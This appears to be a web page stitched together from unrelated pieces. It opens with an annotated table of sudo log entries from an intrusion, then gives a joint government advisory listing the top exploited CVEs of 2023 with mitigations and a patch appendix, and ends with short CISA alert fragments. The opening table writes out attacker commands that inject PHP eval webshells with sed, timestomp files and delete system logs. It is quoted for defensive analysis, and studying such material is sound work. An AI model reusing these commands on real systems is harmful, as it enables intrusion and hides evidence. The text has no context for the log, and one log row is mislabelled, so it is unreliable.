| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/GSB main page/GSB main pageneval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/g’ /opt/landesk/broker/webroot/client/index.php | Adds a webshell into index.php. |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/$canvas_height = 600;/$canvas_height = 600;nteval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/’ /opt/landesk/broker/webroot/gsb/style.php | Adds a webshell into style.php. |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php | Timestomping attempt to change the access and modification of time of index.php. |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php | Timestomping attempt to change the access and modification time of style.php |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php | Timestomping attempt to change the access and modification time of DateTimeTab.php. |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php | Timestomping attempt to change the access and modification time of help.php |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages | Removes evidence. |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf | Removes site.cnf file (exfiltrated credentials). |
| sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php | Removes one of the original webshells. |
|
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/view.php |
Removes one of the original webshells. |
The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies):
This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the following recommendations, and those found within the Mitigations section of this advisory, to reduce the risk of compromise by malicious cyber actors.
The authoring agencies developed this document in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets. In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day.
Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability. The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.
Implementing security-centered product development lifecycles. Software developers deploying patches to fix software vulnerabilities is often a lengthy and expensive process, particularly for zero-days. The use of more robust testing environments and implementing threat modeling throughout the product development lifecycle will likely reduce overall product vulnerabilities.
Increasing incentives for responsible vulnerability disclosure. Global efforts to reduce barriers to responsible vulnerability disclosure could restrict the utility of zero-day exploits used by malicious cyber actors. For example, instituting vulnerability reporting bug bounty programs that allow researchers to receive compensation and recognition for their contributions to vulnerability research may boost disclosures.
Using sophisticated endpoint detection and response (EDR) tools. End users leveraging EDR solutions may improve the detection rate of zero-day exploits. Most zero-day exploits, including at least three of the top 15 vulnerabilities from last year, have been discovered when an end user or EDR system reports suspicious activity or unusual device malfunctions.
Top Routinely Exploited Vulnerabilities
Listed in Table 1 are the top 15 vulnerabilities the authoring agencies observed malicious cyber actors routinely exploiting in 2023 with details also discussed below.
The authoring agencies identified other vulnerabilities, listed in Table 2, that malicious cyber actors also routinely exploited in 2023—in addition to the 15 vulnerabilities listed in Table 1.
Table 2: Additional Routinely Exploited Vulnerabilities in 2023
The authoring agencies recommend vendors and developers take the following steps to help ensure their products are secure by design and default:
For more information on designing secure by design and default products, including additional recommended secure by default configurations, see CISA’s joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security by Design and Default.
The authoring agencies recommend end-user organizations implement the mitigations below to improve their cybersecurity posture based on threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on CPGs, including additional recommended baseline protections.
U.S. organizations: All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.
Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.
New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
United Kingdom organizations: Report a significant cyber security incident at gov.uk/report-cyber (monitored 24 hours).
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
November 12, 2024: Initial version.
Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities
| CVE | Vendor | Affected Products and Versions | Patch Information | Resources |
|---|---|---|---|---|
| CVE-2023-3519 | Citrix |
NetScaler ADC and NetScaler Gateway: 13.1 before 13.1-49.13 13.0 before 13.0-91.13 NetScaler ADC: 13.1-FIPS before 13.1-37.159 12.1-FIPS before 12.1-55.297 12.1-NDcPP before 12.1-55.297 |
Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467 |
Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells Critical Security Update for NetScaler ADC and NetScaler Gateway |
| CVE-2023-4966 | Citrix |
NetScaler ADC and NetScaler Gateway: 14.1 before 14.1-8.50 13.1 before 13.1-49.15 13.0 before 13.0-92.19 NetScaler ADC: 13.1-FIPS before 13.1-37.164 12.1-FIPS before 12.1-55.300 12.1-NDcPP before 12.1-55.300 |
NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966 and CVE-2023-4967 |
#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability Critical Security Update for NetScaler ADC and NetScaler Gateway |
| CVE-2023-20198 | Cisco | Any Cisco IOS XE Software with web UI feature enabled | Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature | Guidance for Addressing Cisco IOS XE Web UI Vulnerabilities |
| CVE-2023-27997 | Fortinet |
FortiOS-6K7K versions: 7.0.10, 7.0.5, 6.4.12 6.4.10, 6.4.8, 6.4.6, 6.4.2 6.2.9 through 6.2.13 6.2.6 through 6.2.7 6.2.4 6.0.12 through 6.0.16 6.0.10 |
Heap buffer overflow in sslvpn pre-authentication | |
| CVE-2023-34362 | Progress |
MOVEit Transfer: 2023.0.0 (15.0) 2022.1.x (14.1) 2022.0.x (14.0) 2021.1.x (13.1) 2021.0.x (13.0) 2020.1.x (12.1) 2020.0.x (12.0) or older MOVEit Cloud |
MOVEit Transfer Critical Vulnerability | #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability |
| CVE-2023-22515 | Atlassian |
8.0.0, 8.0.1, 8.0.2, 8.0.3, 8.0.4 8.1.0, 8.1.1, 8.1.3, 8.1.4 8.2.0, 8.2.1, 8.2.2, 8.2.38.3.0, 8.3.1, 8.3.2 8.4.0, 8.4.1, 8.4.28.5.0, 8.5.1 |
Broken Access Control Vulnerability in Confluence Data Center and Server | Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks |
|
(Log4Shell) |
Apache |
Log4j, all versions from 2.0-beta9 to 2.14.1 For other affected vendors and products, see CISA’s GitHub repository. |
Apache Log4j Security Vulnerabilities For additional information, see joint advisory: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities |
Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems |
| CVE-2023-2868 | Barracuda Networks | 5.1.3.001 through 9.2.0.006 | Barracuda Email Security Gateway Appliance (ESG) Vulnerability | |
| CVE-2022-47966 | Zoho | Multiple products, multiple versions. (For more details, see Security advisory for remote code execution vulnerability in multiple ManageEngine products) | Security advisory for remote code execution vulnerability in multiple ManageEngine products | |
| CVE-2023-27350 | PaperCut |
PaperCut MF or NG version 8.0 or later (excluding patched versions) on all OS platforms. This includes: version 8.0.0 to 19.2.7 (inclusive) version 20.0.0 to 20.1.6 (inclusive) version 21.0.0 to 21.2.10 (inclusive) version 22.0.0 to 22.0.8 (inclusive) |
URGENT MF/NG vulnerability bulletin (March 2023) | Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG |
| CVE-2020-1472 | Microsoft | Netlogon | Netlogon Elevation of Privilege Vulnerability | Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
| CVE-2023-23397 | Microsoft | Outlook | Microsoft Outlook Elevation of Privilege Vulnerability | Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations |
| CVE-2023-49103 | ownCloud | graphapi | Disclosure of Sensitive Credentials and Configuration in Containerized Deployments | |
| CVE-2023-20273 | Cisco | Cisco IOS XE Software with web UI feature enabled | Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature | Guidance for Addressing Cisco IOS XE Web UI Vulnerabilities |
| CVE-2023-42793 | JetBrains | In JetBrains TeamCity before 2023.05.4 | CVE-2023-42793 Vulnerability in TeamCity: Post-Mortem | Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally |
| CVE-2023-22518 | Atlassian | All versions of Confluence Data Cetner and Confluence Server | Improper Authorization in Confluence Data Center and Server | |
| CVE-2023-29492 | — | — | — | |
| CVE-2021-27860 | FatPipe |
WARP, MPVPN, IPVPN 10.1.2 and 10.2.2 |
FatPipe CVE List | |
| CVE-2021-40539 | Zoho | ManageEngine ADSelfService Plus builds up to 6113 | Security advisory – ADSelfService Plus authentication bypass vulnerability |
ACSC Alert: Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors |
| CVE-2023-0669 | Fortra | GoAnywhere versions 2.3 through 7.1.2 | Fortra deserialization RCE | #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability |
| CVE-2021-22986 | F5 |
BIG-IP versions: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 |
K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986 | |
| CVE-2019-0708 | Microsoft | Remote Desktop Services | Remote Desktop Services Remote Code Execution Vulnerability | |
| CVE-2018-13379 | Fortinet | FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 | FortiProxy – system file leak through SSL VPN special crafted HTTP resource requests | |
| CVE-2023-35078 | Ivanti |
All supported versions of Endpoint Manager Mobile (EPMM), including: Version 11.4 releases 11.10, 11.9 and 11.8 |
CVE-2023-35078 – New Ivanti EPMM Vulnerability | Threat Actors Exploiting Ivanti EPMM Vulnerabilities |
| CVE-2023-35081 | Ivanti | All supported versions of Endpoint Manager Mobile (EPMM), including 11.10, 11.9 and 11.8 | CVE-2023-35081 – Remote Arbitrary File Write | Threat Actors Exploiting Ivanti EPMM Vulnerabilities |
| CVE-2023-36844 | Juniper |
Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. |
2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution | |
| CVE-2023-36845 | Juniper |
Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. |
2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution | |
| CVE-2023-36846 | Juniper |
Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. |
2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution | |
| CVE-2023-36847 | Juniper |
Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. |
2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution | |
| CVE-2023-41064 | Apple |
Versions prior to: iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10 |
About the security content of iOS 16.6.1 and iPadOS 16.6.1 About the security content of macOS Ventura 13.5.2 About the security content of iOS 15.7.9 and iPadOS 15.7.9 |
|
| CVE-2023-41061 | Apple | Versions prior to: watchOS 9.6.2, iOS 16.6.1 and iPadOS 16.6.1 |
||
| CVE-2021-22205 | GitLab | All versions starting from 11.9 | RCE when removing metadata with ExifTool | |
| CVE-2019-11510 | Ivanti | Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12 | SA44101 – 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX | |
| CVE-2023-6448 | Unitronics |
VisiLogic versions before 9.9.00 |
Unitronics Cybersecurity Advisory 2023-001: Default administrative password | |
| CVE-2017-6742 | Cisco | Simple Network Management Protocol subsystem of Cisco IOS 12.0 through 12.4 and 15.0 through 15.6 and IOS XE 2.2 through 3.17 | SNMP Remote Code Execution Vulnerabilities in Cisco IOS and IOS XE Software | |
| CVE-2021-4034 | Red Hat |
Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Virtualization 4 Any Red Hat product supported on Red Hat Enterprise Linux (including RHEL CoreOS) is also potentially impacted. |
RHSB-2022-001 Polkit Privilege Escalation – (CVE-2021-4034) | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
| CVE-2021-26084 | Atlassian | Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. | Jira Atlassian: Confluence Server Webwork OGNL injection – CVE-2021-26084 | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
| CVE-2021-33044 | Dahua | Various products | — | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
| CVE-2021-33045 | Dahua | Various products | — | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
| CVE-2022-3236 | Sophos | Sophos Firewall v19.0 MR1 (19.0.1) and older | Resolved RCE in Sophos Firewall (CVE-2022-3236) | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
| CVE-2022-26134 | Atlassian | Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 | Confluence Security Advisory 2022-06-02 | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
| CVE-2022-41040 | Microsoft | Microsoft Exchange servers | Microsoft Exchange Server Elevation of Privilege Vulnerability | |
| CVE-2023-38831 | RARLAB | WinRAR Versions prior to 6.23 Beta 1 | WinRAR 6.23 Beta 1 Released | |
| CVE-2019-18935 | Progress Telerik | Telerik.Web.UI.dll versions:
|
Allows JavaScriptSerializer Deserialization | Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers |
| CVE-2021-34473 | Microsoft |
Exchange Server, Multiple Versions: Q1 2011 (2011.1.315) to R2 2017 SP1 (2017.2.621) R2 2017 SP2 (2017.2.711) to R3 2019 (2019.3.917) R3 2019 SP1 (2019.3.1023) R1 2020 (2020.1.114) and later |
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473 | Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities |
Microsoft released security updates to address vulnerabilities in multiple products. A cyber threat actor could exploit some of these vulnerabilities to take control of an affected system.
CISA encourages users and administrators to review the following and apply necessary updates:
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.